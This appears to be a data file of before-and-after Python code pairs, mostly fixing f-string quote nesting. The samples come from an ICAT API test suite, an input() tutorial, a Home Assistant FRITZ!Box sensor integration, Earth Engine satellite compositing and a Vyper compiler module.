| import pytest
from test.icat.test_query import prepare_icat_data_for_assertion
class TestICATCreateData:
investigation_name_prefix = "Test Data for API Testing, Data Creation"
@pytest.mark.usefixtures("remove_test_created_investigation_data")
def test_valid_create_data(
self, flask_test_app_icat, valid_icat_credentials_header,
):
create_investigations_json = [
{
"name": f"{self.investigation_name_prefix} {i}",
"title": "Test data for the Python ICAT Backend on DataGateway API",
"summary": "Test data for DataGateway API testing",
"releaseDate": "2020-03-03 08:00:08+00:00",
"startDate": "2020-02-02 09:00:09+00:00",
"endDate": "2020-02-03 10:00:10+00:00",
"visitId": "Data Creation Visit",
"doi": "DataGateway API Test DOI",
"facility": 1,
"type": 1,
}
for i in range(2)
]
test_response = flask_test_app_icat.post(
"/investigations",
headers=valid_icat_credentials_header,
json=create_investigations_json,
)
for investigation_request in create_investigations_json:
investigation_request.pop("facility")
investigation_request.pop("type")
response_json = prepare_icat_data_for_assertion(
test_response.json, remove_id=True,
)
assert create_investigations_json == response_json
@pytest.mark.usefixtures("remove_test_created_investigation_data")
def test_valid_boundary_create_data(
self, flask_test_app_icat, valid_icat_credentials_header,
):
"""Create a single investigation, as opposed to multiple"""
create_investigation_json = {
"name": f"{self.investigation_name_prefix} 0",
"title": "Test data for the Python ICAT Backend on the API",
"summary": "Test data for DataGateway API testing",
"releaseDate": "2020-03-03 08:00:08+00:00",
"startDate": "2020-02-02 09:00:09+00:00",
"endDate": "2020-02-03 10:00:10+00:00",
"visitId": "Data Creation Visit",
"doi": "DataGateway API Test DOI",
"facility": 1,
"type": 1,
}
test_response = flask_test_app_icat.post(
"/investigations",
headers=valid_icat_credentials_header,
json=create_investigation_json,
)
create_investigation_json.pop("facility")
create_investigation_json.pop("type")
response_json = prepare_icat_data_for_assertion(
test_response.json, remove_id=True,
)
assert [create_investigation_json] == response_json
def test_invalid_create_data(
self, flask_test_app_icat, valid_icat_credentials_header,
):
"""An investigation requires a minimum of: name, visitId, facility, type"""
invalid_request_body = {
"title": "Test Title for DataGateway API Backend testing",
}
test_response = flask_test_app_icat.post(
"/investigations",
headers=valid_icat_credentials_header,
json=invalid_request_body,
)
assert test_response.status_code == 400
def test_invalid_existing_data_create(
self,
flask_test_app_icat,
valid_icat_credentials_header,
single_investigation_test_data,
):
"""This test targets raising ICATObjectExistsError, causing a 400"""
# entity.as_dict() removes details about facility and type, hence they're
# hardcoded here instead of using sinle_investigation_test_data
existing_object_json = {
"name": single_investigation_test_data[0]["name"],
"title": single_investigation_test_data[0]["title"],
"visitId": single_investigation_test_data[0]["visitId"],
"facility": 1,
"type": 1,
}
test_response = flask_test_app_icat.post(
"/investigations",
headers=valid_icat_credentials_header,
json=existing_object_json,
)
assert test_response.status_code == 400
def test_valid_rollback_behaviour(
self, flask_test_app_icat, valid_icat_credentials_header,
):
request_body = [
{
"name": "Test Investigation DG API Testing Name Test",
"title": "My New Investigation with Title",
"visitId": "Visit ID for Testing",
"facility": 1,
"type": 1,
},
{
"name": "Invalid Investigation for testing",
"title": "My New Investigation with Title",
"visitId": "Visit ID for Testing",
"doi": "_" * 256,
"facility": 1,
"type": 1,
},
]
create_response = flask_test_app_icat.post(
"/investigations", headers=valid_icat_credentials_header, json=request_body,
)
get_response = flask_test_app_icat.get(
'/investigations?where={"title": {"eq": "'
f'{request_body[0]["title"]}'
'"}}',
headers=valid_icat_credentials_header,
)
get_response_json = prepare_icat_data_for_assertion(get_response.json)
assert create_response.status_code == 400
assert get_response_json == []
|
"""The input function allows you to interact with the user"""
name = input("What is your name? ")
print(f"Hello, {name}!")
print("What is your age?")
age = int(input("age: ") or 100)
print(f"You are {age} year{"s" if age > 1 else ""} old.")
hobbies = input("What are your hobbies? (comma separated): ")
hobbies = map(lambda s: s.strip(), hobbies.split(","))
print("Your hobbies are:")
for hobby in hobbies:
print(hobby.capitalize())
def menu():
print(
"1: Set name\n"
"2: Set age\n"
"3: Set address\n"
"4: Print information\n"
"5: Exit"
)
name, age, address = None, None, None
menu()
while not (choice := int(input("# ") or 5)) == 5:
if choice == 1:
name = input("name: ")
elif choice == 2:
age = input("age: ")
elif choice == 3:
address = input("address: ")
elif choice == 4:
print(f"{name=}\n{age=}\n{address=}\n")
menu()
| """The input function allows you to interact with the user"""
name = input("What is your name? ")
print(f"Hello, {name}!")
print("What is your age?")
age = int(input("age: ") or 100)
print(f"You are {age} year{'s' if age > 1 else ''} old.")
hobbies = input("What are your hobbies? (comma separated): ")
hobbies = map(lambda s: s.strip(), hobbies.split(","))
print("Your hobbies are:")
for hobby in hobbies:
print(hobby.capitalize())
def menu():
print(
"1: Set name\n"
"2: Set age\n"
"3: Set address\n"
"4: Print information\n"
"5: Exit"
)
name, age, address = None, None, None
menu()
while not (choice := int(input("# ") or 5)) == 5:
if choice == 1:
name = input("name: ")
elif choice == 2:
age = input("age: ")
elif choice == 3:
address = input("address: ")
elif choice == 4:
print(f"{name=}\n{age=}\n{address=}\n")
menu()
|
"""AVM FRITZ!Box binary sensors."""
from __future__ import annotations
import datetime
import logging
from typing import Callable, TypedDict
from fritzconnection.core.exceptions import FritzConnectionException
from fritzconnection.lib.fritzstatus import FritzStatus
from homeassistant.components.sensor import STATE_CLASS_MEASUREMENT, SensorEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
DATA_GIGABYTES,
DATA_RATE_KILOBYTES_PER_SECOND,
DEVICE_CLASS_TIMESTAMP,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.util.dt import utcnow
from .common import FritzBoxBaseEntity, FritzBoxTools
from .const import DOMAIN, UPTIME_DEVIATION
_LOGGER = logging.getLogger(__name__)
def _retrieve_uptime_state(status: FritzStatus, last_value: str) -> str:
"""Return uptime from device."""
delta_uptime = utcnow() - datetime.timedelta(seconds=status.uptime)
if (
not last_value
or abs(
(delta_uptime - datetime.datetime.fromisoformat(last_value)).total_seconds()
)
> UPTIME_DEVIATION
):
return delta_uptime.replace(microsecond=0).isoformat()
return last_value
def _retrieve_external_ip_state(status: FritzStatus, last_value: str) -> str:
"""Return external ip from device."""
return status.external_ip # type: ignore[no-any-return]
def _retrieve_kb_s_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload transmission rate."""
return round(status.transmission_rate[0] / 1024, 1) # type: ignore[no-any-return]
def _retrieve_kb_s_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download transmission rate."""
return round(status.transmission_rate[1] / 1024, 1) # type: ignore[no-any-return]
def _retrieve_max_kb_s_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload max transmission rate."""
return round(status.max_bit_rate[0] / 1024, 1) # type: ignore[no-any-return]
def _retrieve_max_kb_s_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download max transmission rate."""
return round(status.max_bit_rate[1] / 1024, 1) # type: ignore[no-any-return]
def _retrieve_gb_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload total data."""
return round(status.bytes_sent * 8 / 1024 / 1024 / 1024, 1) # type: ignore[no-any-return]
def _retrieve_gb_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download total data."""
return round(status.bytes_received * 8 / 1024 / 1024 / 1024, 1) # type: ignore[no-any-return]
class SensorData(TypedDict, total=False):
"""Sensor data class."""
name: str
device_class: str | None
state_class: str | None
unit_of_measurement: str | None
icon: str | None
state_provider: Callable
SENSOR_DATA = {
"external_ip": SensorData(
name="External IP",
icon="mdi:earth",
state_provider=_retrieve_external_ip_state,
),
"uptime": SensorData(
name="Uptime",
device_class=DEVICE_CLASS_TIMESTAMP,
state_provider=_retrieve_uptime_state,
),
"kb_s_sent": SensorData(
name="kB/s sent",
state_class=STATE_CLASS_MEASUREMENT,
unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:upload",
state_provider=_retrieve_kb_s_sent_state,
),
"kb_s_received": SensorData(
name="kB/s received",
state_class=STATE_CLASS_MEASUREMENT,
unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:download",
state_provider=_retrieve_kb_s_received_state,
),
"max_kb_s_sent": SensorData(
name="Max kB/s sent",
unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:upload",
state_provider=_retrieve_max_kb_s_sent_state,
),
"max_kb_s_received": SensorData(
name="Max kB/s received",
unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:download",
state_provider=_retrieve_max_kb_s_received_state,
),
"gb_sent": SensorData(
name="GB sent",
unit_of_measurement=DATA_GIGABYTES,
icon="mdi:upload",
state_provider=_retrieve_gb_sent_state,
),
"gb_received": SensorData(
name="GB received",
unit_of_measurement=DATA_GIGABYTES,
icon="mdi:download",
state_provider=_retrieve_gb_received_state,
),
}
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up entry."""
_LOGGER.debug("Setting up FRITZ!Box sensors")
fritzbox_tools: FritzBoxTools = hass.data[DOMAIN][entry.entry_id]
if (
not fritzbox_tools.connection
or "WANIPConn1" not in fritzbox_tools.connection.services
):
# Only routers are supported at the moment
return
entities = []
for sensor_type in SENSOR_DATA:
entities.append(FritzBoxSensor(fritzbox_tools, entry.title, sensor_type))
if entities:
async_add_entities(entities, True)
class FritzBoxSensor(FritzBoxBaseEntity, SensorEntity):
"""Define FRITZ!Box connectivity class."""
def __init__(
self, fritzbox_tools: FritzBoxTools, device_friendly_name: str, sensor_type: str
) -> None:
"""Init FRITZ!Box connectivity class."""
self._sensor_data: SensorData = SENSOR_DATA[sensor_type]
self._last_value: str | None = None
self._attr_available = True
self._attr_device_class = self._sensor_data.get("device_class")
self._attr_icon = self._sensor_data.get("icon")
self._attr_name = f"{device_friendly_name} {self._sensor_data["name"]}"
self._attr_state_class = self._sensor_data.get("state_class")
self._attr_unit_of_measurement = self._sensor_data.get("unit_of_measurement")
self._attr_unique_id = f"{fritzbox_tools.unique_id}-{sensor_type}"
super().__init__(fritzbox_tools, device_friendly_name)
@property
def _state_provider(self) -> Callable:
"""Return the state provider for the binary sensor."""
return self._sensor_data["state_provider"]
def update(self) -> None:
"""Update data."""
_LOGGER.debug("Updating FRITZ!Box sensors")
try:
status: FritzStatus = self._fritzbox_tools.fritz_status
self._attr_available = True
except FritzConnectionException:
_LOGGER.error("Error getting the state from the FRITZ!Box", exc_info=True)
self._attr_available = False
return
self._attr_state = self._last_value = self._state_provider(
status, self._last_value
)
| """AVM FRITZ!Box binary sensors."""
from __future__ import annotations
import datetime
import logging
from typing import Callable, TypedDict
from fritzconnection.core.exceptions import FritzConnectionException
from fritzconnection.lib.fritzstatus import FritzStatus
from homeassistant.components.sensor import STATE_CLASS_MEASUREMENT, SensorEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
DATA_GIGABYTES,
DATA_RATE_KILOBYTES_PER_SECOND,
DEVICE_CLASS_TIMESTAMP,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.util.dt import utcnow
from .common import FritzBoxBaseEntity, FritzBoxTools
from .const import DOMAIN, UPTIME_DEVIATION
_LOGGER = logging.getLogger(__name__)
def _retrieve_uptime_state(status: FritzStatus, last_value: str) -> str:
"""Return uptime from device."""
delta_uptime = utcnow() - datetime.timedelta(seconds=status.uptime)
if (
not last_value
or abs(
(delta_uptime - datetime.datetime.fromisoformat(last_value)).total_seconds()
)
> UPTIME_DEVIATION
):
return delta_uptime.replace(microsecond=0).isoformat()
return last_value
def _retrieve_external_ip_state(status: FritzStatus, last_value: str) -> str:
"""Return external ip from device."""
return status.external_ip # type: ignore[no-any-return]
def _retrieve_kb_s_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload transmission rate."""
return round(status.transmission_rate[0] / 1024, 1) # type: ignore[no-any-return]
def _retrieve_kb_s_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download transmission rate."""
return round(status.transmission_rate[1] / 1024, 1) # type: ignore[no-any-return]
def _retrieve_max_kb_s_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload max transmission rate."""
return round(status.max_bit_rate[0] / 1024, 1) # type: ignore[no-any-return]
def _retrieve_max_kb_s_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download max transmission rate."""
return round(status.max_bit_rate[1] / 1024, 1) # type: ignore[no-any-return]
def _retrieve_gb_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload total data."""
return round(status.bytes_sent * 8 / 1024 / 1024 / 1024, 1) # type: ignore[no-any-return]
def _retrieve_gb_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download total data."""
return round(status.bytes_received * 8 / 1024 / 1024 / 1024, 1) # type: ignore[no-any-return]
class SensorData(TypedDict, total=False):
"""Sensor data class."""
name: str
device_class: str | None
state_class: str | None
unit_of_measurement: str | None
icon: str | None
state_provider: Callable
SENSOR_DATA = {
"external_ip": SensorData(
name="External IP",
icon="mdi:earth",
state_provider=_retrieve_external_ip_state,
),
"uptime": SensorData(
name="Uptime",
device_class=DEVICE_CLASS_TIMESTAMP,
state_provider=_retrieve_uptime_state,
),
"kb_s_sent": SensorData(
name="kB/s sent",
state_class=STATE_CLASS_MEASUREMENT,
unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:upload",
state_provider=_retrieve_kb_s_sent_state,
),
"kb_s_received": SensorData(
name="kB/s received",
state_class=STATE_CLASS_MEASUREMENT,
unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:download",
state_provider=_retrieve_kb_s_received_state,
),
"max_kb_s_sent": SensorData(
name="Max kB/s sent",
unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:upload",
state_provider=_retrieve_max_kb_s_sent_state,
),
"max_kb_s_received": SensorData(
name="Max kB/s received",
unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:download",
state_provider=_retrieve_max_kb_s_received_state,
),
"gb_sent": SensorData(
name="GB sent",
unit_of_measurement=DATA_GIGABYTES,
icon="mdi:upload",
state_provider=_retrieve_gb_sent_state,
),
"gb_received": SensorData(
name="GB received",
unit_of_measurement=DATA_GIGABYTES,
icon="mdi:download",
state_provider=_retrieve_gb_received_state,
),
}
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up entry."""
_LOGGER.debug("Setting up FRITZ!Box sensors")
fritzbox_tools: FritzBoxTools = hass.data[DOMAIN][entry.entry_id]
if (
not fritzbox_tools.connection
or "WANIPConn1" not in fritzbox_tools.connection.services
):
# Only routers are supported at the moment
return
entities = []
for sensor_type in SENSOR_DATA:
entities.append(FritzBoxSensor(fritzbox_tools, entry.title, sensor_type))
if entities:
async_add_entities(entities, True)
class FritzBoxSensor(FritzBoxBaseEntity, SensorEntity):
"""Define FRITZ!Box connectivity class."""
def __init__(
self, fritzbox_tools: FritzBoxTools, device_friendly_name: str, sensor_type: str
) -> None:
"""Init FRITZ!Box connectivity class."""
self._sensor_data: SensorData = SENSOR_DATA[sensor_type]
self._last_value: str | None = None
self._attr_available = True
self._attr_device_class = self._sensor_data.get("device_class")
self._attr_icon = self._sensor_data.get("icon")
self._attr_name = f"{device_friendly_name} {self._sensor_data['name']}"
self._attr_state_class = self._sensor_data.get("state_class")
self._attr_unit_of_measurement = self._sensor_data.get("unit_of_measurement")
self._attr_unique_id = f"{fritzbox_tools.unique_id}-{sensor_type}"
super().__init__(fritzbox_tools, device_friendly_name)
@property
def _state_provider(self) -> Callable:
"""Return the state provider for the binary sensor."""
return self._sensor_data["state_provider"]
def update(self) -> None:
"""Update data."""
_LOGGER.debug("Updating FRITZ!Box sensors")
try:
status: FritzStatus = self._fritzbox_tools.fritz_status
self._attr_available = True
except FritzConnectionException:
_LOGGER.error("Error getting the state from the FRITZ!Box", exc_info=True)
self._attr_available = False
return
self._attr_state = self._last_value = self._state_provider(
status, self._last_value
)
|
import ee
from datetime import timedelta, datetime
from dateutil.relativedelta import relativedelta
from monthdelta import monthdelta
def s2_cloudmask(image):
qa = image.select('QA60');
# Bits 10 and 11 are clouds and cirrus, respectively.
cloudBitMask = 1 << 10
cirrusBitMask = 1 << 11
# Both flags should be set to zero, indicating clear conditions.
mask = qa.bitwiseAnd(cloudBitMask).eq(0).And(qa.bitwiseAnd(cirrusBitMask).eq(0))
return image.updateMask(mask)
def rename_s2_bands(image):
return image.rename(['B', 'G', 'R', 'NIR', 'SWIR2', 'SWIR', 'QA60'])
def get_s2_image_collection(begin_date, end_date, aoi=None):
"""
Calls the GEE API to collect scenes from the Landsat 4 Tier 1 Surface Reflectance Libraries
:param begin_date: Begin date for time period for scene selection
:param end_date: End date for time period for scene selection
:param aoi: Optional, only select scenes that cover this aoi
:return: cloud masked GEE image collection
"""
if aoi is None:
return (ee.ImageCollection('COPERNICUS/S2_SR')
.select('B2', 'B3', 'B4', 'B8', 'B11', 'B12', 'QA60')
.filterDate(begin_date, end_date)
.map(rename_s2_bands)
.map(s2_cloudmask))
else:
return (ee.ImageCollection('COPERNICUS/S2_SR')
.select('B2', 'B3', 'B4', 'B8', 'B11', 'B12', 'QA60')
.filterBounds(aoi)
.filterDate(begin_date, end_date)
.map(rename_s2_bands)
.map(s2_cloudmask))
def create_monthly_index_images(image_collection, start_date, end_date, aoi, stats=['median']):
"""
Generates a monthly composite for an imagecollection
:param image_collection: EE imagecollection with satellite scenes from which the composites are to be created
:param start_date: Date at which the image collection begins
:param end_date: Date at which the image Collection ends
:param aoi: Area of interest
:param stats: list of statistics to use for the monthly composite, possibilities are: 'mean', 'max', 'min', 'median'
:return: Returns an EE imagecollection contaning monthly NDVI Images
"""
if not str(type(start_date)) == 'datetime.datetime' or str(type(end_date) == 'datetime.datetime'):
try:
start_date = datetime.strptime(start_date, '%Y-%m-%d')
end_date = datetime.strptime(end_date, '%Y-%m-%d')
except ValueError:
print('Please use following date format: YYYY-MM-DD')
images = ee.List([])
time_dif = relativedelta(end_date, start_date)
month_dif = time_dif.years * 12 + time_dif.months
for i in range(month_dif):
start_month = start_date + monthdelta(i)
end_month = start_date + monthdelta(i + 1) - timedelta(days=1)
filler_data = image_collection.filter(ee.Filter.date(start_month - monthdelta(1), start_month)).merge(
image_collection.filter(ee.Filter.date(end_month, end_month + monthdelta(1))))
monthly_stats = []
for stat in stats:
if stat == 'mean':
monthly_mean = (image_collection.filter(
ee.Filter.date(start_month, end_month))
.mean()
.set('month', start_month.month)
.set('year', start_month.year)
.set('date_info',
ee.String(f'{datetime.strftime(start_month, '%b')}_{start_month.year}'))
.set('system:time_start', ee.Date(start_month).millis())
)
monthly_mean = monthly_mean.unmask(filler_data, True).clip(aoi)
monthly_stats += [monthly_mean]
elif stat == 'min':
monthly_min = (image_collection.filter(
ee.Filter.date(start_month, end_month))
.reduce(ee.Reducer.percentile(ee.List([10])))
.rename(f'min')
.set('month', start_month.month)
.set('year', start_month.year)
.set('date_info',
ee.String(f'{datetime.strftime(start_month, '%b')}_{start_month.year}'))
.set('system:time_start', ee.Date(start_month).millis())
)
monthly_min = monthly_min.unmask(filler_data.reduce(ee.Reducer.percentile(ee.List([10]))), True).clip(aoi)
monthly_stats += [monthly_min]
elif stat == 'max':
monthly_max = (image_collection.filter(
ee.Filter.date(start_month, end_month))
.reduce(ee.Reducer.percentile(ee.List([90])))
.rename(f'max')
.set('month', start_month.month)
.set('year', start_month.year)
.set('date_info',
ee.String(f'{datetime.strftime(start_month, '%b')}_{start_month.year}'))
.set('system:time_start', ee.Date(start_month).millis())
)
monthly_max = monthly_max.unmask(filler_data.reduce(ee.Reducer.percentile(ee.List([90]))), True).clip(aoi)
monthly_stats += [monthly_max]
elif stat == 'median':
monthly_median = (image_collection.filter(
ee.Filter.date(start_month, end_month))
.median()
.clip(aoi)
.set('month', start_month.month)
.set('year', start_month.year)
.set('date_info',
ee.String(f'{datetime.strftime(start_month, '%b')}_{start_month.year}'))
.set('system:time_start', ee.Date(start_month).millis())
)
if monthly_median.bandNames().size().getInfo() == 0:
print(f'No data available for: {datetime.strftime(start_month, '%b')} {start_month.year}')
continue
monthly_median = monthly_median.unmask(filler_data.median(), True).clip(aoi)
monthly_stats += [monthly_median]
else:
raise ValueError("Unknown statistic entered, please pick from: ['mean', 'max', 'min', 'median'].")
for ind, st in enumerate(monthly_stats):
if ind == 0:
img = monthly_stats[0]
else:
img = img.addBands(st)
images = images.add(img)
return ee.ImageCollection(images)
| import ee
from datetime import timedelta, datetime
from dateutil.relativedelta import relativedelta
from monthdelta import monthdelta
def s2_cloudmask(image):
qa = image.select('QA60');
# Bits 10 and 11 are clouds and cirrus, respectively.
cloudBitMask = 1 << 10
cirrusBitMask = 1 << 11
# Both flags should be set to zero, indicating clear conditions.
mask = qa.bitwiseAnd(cloudBitMask).eq(0).And(qa.bitwiseAnd(cirrusBitMask).eq(0))
return image.updateMask(mask)
def rename_s2_bands(image):
return image.rename(['B', 'G', 'R', 'NIR', 'SWIR2', 'SWIR', 'QA60'])
def get_s2_image_collection(begin_date, end_date, aoi=None):
"""
Calls the GEE API to collect scenes from the Landsat 4 Tier 1 Surface Reflectance Libraries
:param begin_date: Begin date for time period for scene selection
:param end_date: End date for time period for scene selection
:param aoi: Optional, only select scenes that cover this aoi
:return: cloud masked GEE image collection
"""
if aoi is None:
return (ee.ImageCollection('COPERNICUS/S2_SR')
.select('B2', 'B3', 'B4', 'B8', 'B11', 'B12', 'QA60')
.filterDate(begin_date, end_date)
.map(rename_s2_bands)
.map(s2_cloudmask))
else:
return (ee.ImageCollection('COPERNICUS/S2_SR')
.select('B2', 'B3', 'B4', 'B8', 'B11', 'B12', 'QA60')
.filterBounds(aoi)
.filterDate(begin_date, end_date)
.map(rename_s2_bands)
.map(s2_cloudmask))
def create_monthly_index_images(image_collection, start_date, end_date, aoi, stats=['median']):
"""
Generates a monthly composite for an imagecollection
:param image_collection: EE imagecollection with satellite scenes from which the composites are to be created
:param start_date: Date at which the image collection begins
:param end_date: Date at which the image Collection ends
:param aoi: Area of interest
:param stats: list of statistics to use for the monthly composite, possibilities are: 'mean', 'max', 'min', 'median'
:return: Returns an EE imagecollection contaning monthly NDVI Images
"""
if not str(type(start_date)) == 'datetime.datetime' or str(type(end_date) == 'datetime.datetime'):
try:
start_date = datetime.strptime(start_date, '%Y-%m-%d')
end_date = datetime.strptime(end_date, '%Y-%m-%d')
except ValueError:
print('Please use following date format: YYYY-MM-DD')
images = ee.List([])
time_dif = relativedelta(end_date, start_date)
month_dif = time_dif.years * 12 + time_dif.months
for i in range(month_dif):
start_month = start_date + monthdelta(i)
end_month = start_date + monthdelta(i + 1) - timedelta(days=1)
filler_data = image_collection.filter(ee.Filter.date(start_month - monthdelta(1), start_month)).merge(
image_collection.filter(ee.Filter.date(end_month, end_month + monthdelta(1))))
monthly_stats = []
for stat in stats:
if stat == 'mean':
monthly_mean = (image_collection.filter(
ee.Filter.date(start_month, end_month))
.mean()
.set('month', start_month.month)
.set('year', start_month.year)
.set('date_info',
ee.String(f'{datetime.strftime(start_month, "%b")}_{start_month.year}'))
.set('system:time_start', ee.Date(start_month).millis())
)
monthly_mean = monthly_mean.unmask(filler_data, True).clip(aoi)
monthly_stats += [monthly_mean]
elif stat == 'min':
monthly_min = (image_collection.filter(
ee.Filter.date(start_month, end_month))
.reduce(ee.Reducer.percentile(ee.List([10])))
.rename(f'min')
.set('month', start_month.month)
.set('year', start_month.year)
.set('date_info',
ee.String(f'{datetime.strftime(start_month, "%b")}_{start_month.year}'))
.set('system:time_start', ee.Date(start_month).millis())
)
monthly_min = monthly_min.unmask(filler_data.reduce(ee.Reducer.percentile(ee.List([10]))), True).clip(aoi)
monthly_stats += [monthly_min]
elif stat == 'max':
monthly_max = (image_collection.filter(
ee.Filter.date(start_month, end_month))
.reduce(ee.Reducer.percentile(ee.List([90])))
.rename(f'max')
.set('month', start_month.month)
.set('year', start_month.year)
.set('date_info',
ee.String(f'{datetime.strftime(start_month, "%b")}_{start_month.year}'))
.set('system:time_start', ee.Date(start_month).millis())
)
monthly_max = monthly_max.unmask(filler_data.reduce(ee.Reducer.percentile(ee.List([90]))), True).clip(aoi)
monthly_stats += [monthly_max]
elif stat == 'median':
monthly_median = (image_collection.filter(
ee.Filter.date(start_month, end_month))
.median()
.clip(aoi)
.set('month', start_month.month)
.set('year', start_month.year)
.set('date_info',
ee.String(f'{datetime.strftime(start_month, "%b")}_{start_month.year}'))
.set('system:time_start', ee.Date(start_month).millis())
)
if monthly_median.bandNames().size().getInfo() == 0:
print(f'No data available for: {datetime.strftime(start_month, "%b")} {start_month.year}')
continue
monthly_median = monthly_median.unmask(filler_data.median(), True).clip(aoi)
monthly_stats += [monthly_median]
else:
raise ValueError("Unknown statistic entered, please pick from: ['mean', 'max', 'min', 'median'].")
for ind, st in enumerate(monthly_stats):
if ind == 0:
img = monthly_stats[0]
else:
img = img.addBands(st)
images = images.add(img)
return ee.ImageCollection(images)
|
from vyper import ast as vy_ast
from vyper.exceptions import (
ConstancyViolation,
FunctionDeclarationException,
StructureException,
TypeMismatch,
VariableDeclarationException,
)
from vyper.parser.lll_node import LLLnode
from vyper.parser.parser_utils import getpos, pack_arguments, unwrap_location
from vyper.types import (
BaseType,
ByteArrayLike,
ListType,
TupleLike,
get_size_of_type,
)
def external_contract_call(node,
context,
contract_name,
contract_address,
pos,
value=None,
gas=None):
from vyper.parser.expr import (
Expr,
)
if value is None:
value = 0
if gas is None:
gas = 'gas'
if not contract_name:
raise StructureException(
f'Invalid external contract call "{node.func.attr}".',
node
)
if contract_name not in context.sigs:
raise VariableDeclarationException(
f'Contract "{contract_name}" not declared yet',
node
)
if contract_address.value == "address":
raise StructureException(
f"External calls to self are not permitted.", node
)
method_name = node.func.attr
if method_name not in context.sigs[contract_name]:
raise FunctionDeclarationException(
(
f"Function not declared yet: {method_name} (reminder: "
"function must be declared in the correct contract)"
f"The available methods are: {",".join(context.sigs[contract_name].keys())}"
),
node.func
)
sig = context.sigs[contract_name][method_name]
inargs, inargsize, _ = pack_arguments(
sig,
[Expr(arg, context).lll_node for arg in node.args],
context,
node.func,
)
output_placeholder, output_size, returner = get_external_contract_call_output(sig, context)
sub = [
'seq',
['assert', ['extcodesize', contract_address]],
['assert', ['ne', 'address', contract_address]],
]
if context.is_constant() and not sig.const:
raise ConstancyViolation(
f"May not call non-constant function '{method_name}' within {context.pp_constancy()}."
" For asserting the result of modifiable contract calls, try assert_modifiable.",
node
)
if context.is_constant() or sig.const:
sub.append([
'assert',
[
'staticcall',
gas, contract_address, inargs, inargsize, output_placeholder, output_size,
]
])
else:
sub.append([
'assert',
[
'call',
gas, contract_address, value, inargs, inargsize, output_placeholder, output_size,
]
])
sub.extend(returner)
o = LLLnode.from_list(sub, typ=sig.output_type, location='memory', pos=getpos(node))
return o
def get_external_contract_call_output(sig, context):
if not sig.output_type:
return 0, 0, []
output_placeholder = context.new_placeholder(typ=sig.output_type)
output_size = get_size_of_type(sig.output_type) * 32
if isinstance(sig.output_type, BaseType):
returner = [0, output_placeholder]
elif isinstance(sig.output_type, ByteArrayLike):
returner = [0, output_placeholder + 32]
elif isinstance(sig.output_type, TupleLike):
returner = [0, output_placeholder]
elif isinstance(sig.output_type, ListType):
returner = [0, output_placeholder]
else:
raise TypeMismatch(f"Invalid output type: {sig.output_type}")
return output_placeholder, output_size, returner
def get_external_contract_keywords(stmt_expr, context):
from vyper.parser.expr import Expr
value, gas = None, None
for kw in stmt_expr.keywords:
if kw.arg not in ('value', 'gas'):
raise TypeMismatch(
'Invalid keyword argument, only "gas" and "value" supported.',
stmt_expr,
)
elif kw.arg == 'gas':
gas = Expr.parse_value_expr(kw.value, context)
elif kw.arg == 'value':
value = Expr.parse_value_expr(kw.value, context)
return value, gas
def make_external_call(stmt_expr, context):
from vyper.parser.expr import Expr
value, gas = get_external_contract_keywords(stmt_expr, context)
if (
isinstance(stmt_expr.func, vy_ast.Attribute) and
isinstance(stmt_expr.func.value, vy_ast.Call)
):
contract_name = stmt_expr.func.value.func.id
contract_address = Expr.parse_value_expr(stmt_expr.func.value.args[0], context)
return external_contract_call(
stmt_expr,
context,
contract_name,
contract_address,
pos=getpos(stmt_expr),
value=value,
gas=gas,
)
elif isinstance(stmt_expr.func.value, vy_ast.Attribute) and stmt_expr.func.value.attr in context.sigs: # noqa: E501
contract_name = stmt_expr.func.value.attr
var = context.globals[stmt_expr.func.value.attr]
contract_address = unwrap_location(LLLnode.from_list(
var.pos,
typ=var.typ,
location='storage',
pos=getpos(stmt_expr),
annotation='self.' + stmt_expr.func.value.attr,
))
return external_contract_call(
stmt_expr,
context,
contract_name,
contract_address,
pos=getpos(stmt_expr),
value=value,
gas=gas,
)
elif (
isinstance(stmt_expr.func.value, vy_ast.Attribute) and
stmt_expr.func.value.attr in context.globals
and hasattr(context.globals[stmt_expr.func.value.attr].typ, 'name')
):
contract_name = context.globals[stmt_expr.func.value.attr].typ.name
var = context.globals[stmt_expr.func.value.attr]
contract_address = unwrap_location(LLLnode.from_list(
var.pos,
typ=var.typ,
location='storage',
pos=getpos(stmt_expr),
annotation='self.' + stmt_expr.func.value.attr,
))
return external_contract_call(
stmt_expr,
context,
contract_name,
contract_address,
pos=getpos(stmt_expr),
value=value,
gas=gas,
)
else:
raise StructureException("Unsupported operator.", stmt_expr)
| from vyper import ast as vy_ast
from vyper.exceptions import (
ConstancyViolation,
FunctionDeclarationException,
StructureException,
TypeMismatch,
VariableDeclarationException,
)
from vyper.parser.lll_node import LLLnode
from vyper.parser.parser_utils import getpos, pack_arguments, unwrap_location
from vyper.types import (
BaseType,
ByteArrayLike,
ListType,
TupleLike,
get_size_of_type,
)
def external_contract_call(node,
context,
